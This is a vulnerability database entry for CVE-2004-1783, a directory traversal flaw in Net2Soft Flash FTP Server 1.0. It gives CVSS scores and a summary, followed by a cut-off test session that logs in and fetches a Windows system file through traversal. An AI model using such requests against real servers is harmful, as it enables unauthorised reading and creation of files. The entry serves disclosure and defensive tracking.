7.5
CVSSv2

CVE-2004-1783

Published: 31/12/2004 Updated: 05/09/2008
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Directory traversal vulnerability in Net2Soft Flash FTP Server 1.0 allows remote malicious users to read and create arbitrary files via a /.. (slash dot dot).

Vulnerable Product Search on Vulmon Subscribe to Product

Exploits

TestCode: C:\>ftp localhost Connected to server 220 Flash FTP Server v21 ready User (server:(none)): CoolICE 331 Password required for CoolICE Password: 230 User CoolICE logged in ftp> get /winnt/systemini 200 Port command successful 150 Opening data connection for /winnt/systemini 226 File sent ok ftp: 227 bytes received in 001Se ...